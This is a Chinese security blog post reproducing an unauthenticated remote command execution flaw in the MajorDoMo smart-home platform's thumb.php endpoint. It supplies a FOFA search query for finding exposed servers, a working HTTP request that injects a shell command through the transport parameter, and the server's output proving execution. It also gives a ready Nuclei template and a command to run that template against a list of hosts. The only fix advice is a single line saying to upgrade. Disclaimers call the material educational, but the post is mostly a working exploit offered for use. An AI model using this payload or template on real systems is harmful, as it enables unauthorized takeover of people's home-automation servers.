MajorDoMo thumb.php 未授权远程代码执行漏洞

最新推荐文章于 2024-06-14 08:27:12 发布
最新推荐文章于 2024-06-14 08:27:12 发布
阅读量647 收藏 13
点赞数 7
文章标签: 网络安全 web安全 网络攻击模型 安全威胁分析 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43689708/article/details/138086001
版权

0x01 免责声明

        请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02 漏洞描述

        MajorDoMo是MajorDoMo社区的一个开源DIY智能家居自动化平台。MajorDoMo 0662e5e之前版本/modules/thumb/thumb.php接口处存在未授权远程命令执行漏洞,未经授权的攻击者可以通过该漏洞获取到服务器权限。

0x03 版本影响漏洞

        MajorDoMo < 0662e5e版本

0x03 漏洞环境

        FOFA搜索:【app="MajordomoSL"】

0x05 漏洞复现

POC(来自互联网),主要是执行id命令并打印

GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

响应包内容,如下所示:

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
Date: Mon, 22 Apr 2024 02:22:10 GMT
Server: nginx/1.14.2

avconv -rtsp_transport || (echo '[S]'; id; echo '[E]')#; -v verbose -timelimit 15 -y -i "rtsp://a
" -r 5 -f image2 -vframes 1 ./cms/cached/thumb_4ea039b31dc743929d475b96816a8529rtspa<hr><pre>[S]
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),33(www-data),44(video),46(plugdev),60(games),100(users),105(input),109(netdev),997(gpio),998(i2c),999(spi)
[E]</pre>

漏洞复现成功。

0x06 Nuclei Poc

id: CNVD-2024-02175

info:
  name: MajorDoMo thumb.php 未授权远程代码执行漏洞
  author: fgz
  severity: critical
  description: MajorDoMo是MajorDoMo社区的一个开源DIY智能家居自动化平台。MajorDoMo 0662e5e之前版本/modules/thumb/thumb.php接口处存在未授权远程命令执行漏洞,未经授权的攻击者可以通过该漏洞获取到服务器权限。
  metadata:
    max-request: 1
    fofa-query: app="MajordomoSL"
    verified: true
requests:
  - raw:
      - |+
        GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
        Accept-Charset: utf-8
        Accept-Encoding: gzip, deflate
        Connection: close

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, 'uid') && contains(body, 'gid')"
        condition: and

运行POC:
 

nuclei.exe -t mypoc/cnvd/CNVD-2024-02175.yaml -l data\2.txt

0x06 修复建议

        升级到最新版本。

---------------------------------------------------------------------------------------------------------------------------------

再次申明!!!再次申明!!!再次申明!!!

        请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

iscanf
关注
  • 7
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MajorDoMo thumb.php 授权RCE漏洞复现(CNVD-2024-02175)
0xSec
04-16 655
MajorDoMo /modules/thumb/thumb.php接口处存在远程命令执行漏洞经身份验证的攻击者可利用此漏洞执行任意指令,获取服务器权限。
MajorDoMo thumb.php 授权RCE漏洞复现(CNVD-2024-02175)(含批量验证poc)
weixin_43567873的博客
04-28 191
MajorDoMo thumb.php 授权RCE漏洞复现(CNVD-2024-02175)(含批量验证poc)
漏洞复现】MajorDoMo智能家居平台thumb接口存在远程命令执行漏洞
失心少年
05-01 51
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。漏洞链接:http://127.0.0.1/modules/thumb/thumb.php?MajorDoMo 0662e5e之前版本存在代码注入漏洞,攻击者可利用该漏洞通过thumb.php shell元字符执行任意命令。MajorDoMo智能家居平台thumb接口存在远程命令执行漏洞,攻击者可通过改漏洞控制系统。
Majordomo Info VGER.KERNEL.ORG
weixin_30279671的博客
05-28 392
This isVGER.KERNEL.ORG Majordomo Info The mission ofvger.kernel.orgis to provide email list services for the linux kernel developers. Sections: Subscription/Unsubscription A very ...
Kali Linux 网络扫描秘籍 第五章 漏洞扫描
热门推荐
龙哥盟
11-22 5万+
第五章 漏洞扫描 作者:Justin Hutchens 译者:飞龙 协议:CC BY-NC-SA 4.0 尽管可以通过查看服务指纹的结果,以及研究所识别的版本的相关漏洞来识别许多潜在漏洞,但这通常需要非常大量时间。 存在更多的精简备选方案,它们通常可以为你完成大部分这项工作。 这些备选方案包括使用自动化脚本和程序,可以通过扫描远程系统来识别漏洞验证的漏洞扫描程序的原理是
【复现】MajorDoMo 远程命令执行漏洞_73
fushuang333的博客
04-18 502
【复现】MajorDoMo 远程命令执行漏洞,通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。
php 设计模式 职责链,PHP设计模式——职责链模式
weixin_34998865的博客
04-01 78
职责链模式(又叫责任链模式)包含了一些命令对象和一些处理对象,每个处理对象决定它能处理那些命令对象,它也知道应该把自己不能处理的命令对象交下一个处理对象,该模式还描述了往该链添加新的处理对象的方法。UML类图:图片.png角色:抽象处理者(Manager):定义出一个处理请求的接口。如果需要,接口可以定义出一个方法,以设定和返回对下家的引用。这个角色通常由一个抽象类或接口实现。具体处理者(Comm...
责任链模式处理订单php,责任链模式和php实现
weixin_42629522的博客
03-26 166
职责链模式(又叫责任链模式):包含了一些命令对象和一些处理对象,每个处理对象决定它能处理那些命令对象,它也知道应该把自己不能处理的命令对象交下一个处理对象,该模式还描述了往该链添加新的处理对象的方法。角色:抽象处理者:定义出一个处理请求的接口。如果需要,接口可以定义出一个方法,以设定和返回对下家的引用。这个角色通常由一个抽象类或接口实现。具体处理者:具体处理者接到请求后,可以选择将请求处理掉,或者...
手把手教你如何向 Linux 内核提交代码
技术杂谈
11-23 6849
本文来自作者 刘盼 在 GitChat 上分享「手把手教你如何向 Linux 内核提交代码」,「阅读原文」查看交流实录 「文末高能」 编辑 | 施瓦 开源的力量 说到开源大家都会想到黑客和极客,开源的概念最早也是在极客们推出和推崇的。开源的提倡旨在开放源代码使之更方便自由的使用和再创作。 随着这一思想的发展,衍生出诸多的开源协议,比如有GPL,BSD,M
majordomo:家庭自动化平台
05-14
什么是MajorDoMo MajorDoMo(主要家庭模块)是一个开源DIY智能家庭自动化平台,旨在用于多协议和多服务环境。 它基于Web技术堆栈,可随时交付给任何现代设备。 使用用于设置自动化规则和脚本的OOP范例进行配置时,它...
majordomo-xiaomimiio:小米智能家居miIO设备集成
05-01
小米miIO 该模块旨在将MajorDoMo与小米Mihome生态系统的Wi-Fi设备集成在一起,并使用miIO协议进行交互。 miIO是具有加密功能的小米专有网络协议,小米生态系统中的wifi设备通过该协议与智能手机上的Mihome应用进行...
majordomo-esp8266_wifiot:支持wifi-iot.com设备
03-06
majordomo-esp8266_wifiot 支持wifi-iot.com设备
majordomo-google_tts
04-29
majordomo-google_tts 适用于MajorDoMo的Google TTS,无需使用API
mdmTerminal2:MajorDoMo语音终端
05-24
mdmTerminal 2 家庭自动化语音终端, 。 能力开始识别所有关键字。 向服务器发送命令。 支持(sayReply,ask等)。 服务器。 。 。 。 一体化 : 。 :(WIP)。 :通过用于MQTT支持的。... Google主页:通过插件(部分...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8289
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全和信息安全
waitaikong_的博客
06-12 627
信息安全网络安全与网络空间安全是当前信息技术领域内的三个重要概念,它们在某些方面有着紧密的联系,同时在不同的语境和应用场景下又有所区别。本次分析旨在深入理解这三个概念的定义、内涵及其相互关系,以便更好地应用于实际工作中。综上所述,信息安全网络安全和网络空间安全是三个密切相关但又各具特色的概念。信息安全关注的是信息本身的保护,网络安全侧重于网络环境和设施的安全,而网络空间安全则是一个更全面的框架,它不仅包括了信息安全网络安全的内容,还延伸到了更广泛的社会和法律层面。
网络安全在个人生活中具体有哪些常见的应用场景?
2301_79955948的博客
06-10 483
通过上述场景可以看出,网络安全在个人生活中扮演着至关重要的角色,它不仅关系到个人隐私和财产安全,也影响到日常生活的方方面面。7. 物联网设备安全网络安全可以保护智能家居、智能设备等物联网设备的安全,避免网络攻击和数据泄露。5. 远程办公和学习:网络安全可以保障企业和学校网络系统的安全和稳定性,避免数据泄露和网络攻击。6. 云存储和备份:网络安全可以保护云存储服务和备份数据的安全,防止黑客攻击和数据泄露。8. 移动设备安全网络安全可以保护移动设备的安全和数据隐私,防止恶意软件和网络攻击
网络安全攻防演练:提升应急响应能力
最新发布
weixin_64392888的博客
06-14 681
随着网络威胁的不断演变,组织需要持续投入资源和精力,通过攻防演练等手段,构建更加安全和健壮的网络环境。在网络攻击日益频繁和复杂的今天,网络安全攻防演练成为提升组织应急响应能力的重要手段。在一次模拟钓鱼攻击的演练中,攻击团队通过发送带有恶意链接的电子邮件,成功绕过了部分员工的警惕。演练结束后,组织加强了员工的网络安全培训,并更新了钓鱼攻击的防御策略。网络安全攻防演练是一种主动的安全测试方法,它通过模拟攻击者的行为,评估组织的网络安全防护措施和应急响应流程的有效性。分析演练过程,评估攻击和防御的效果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值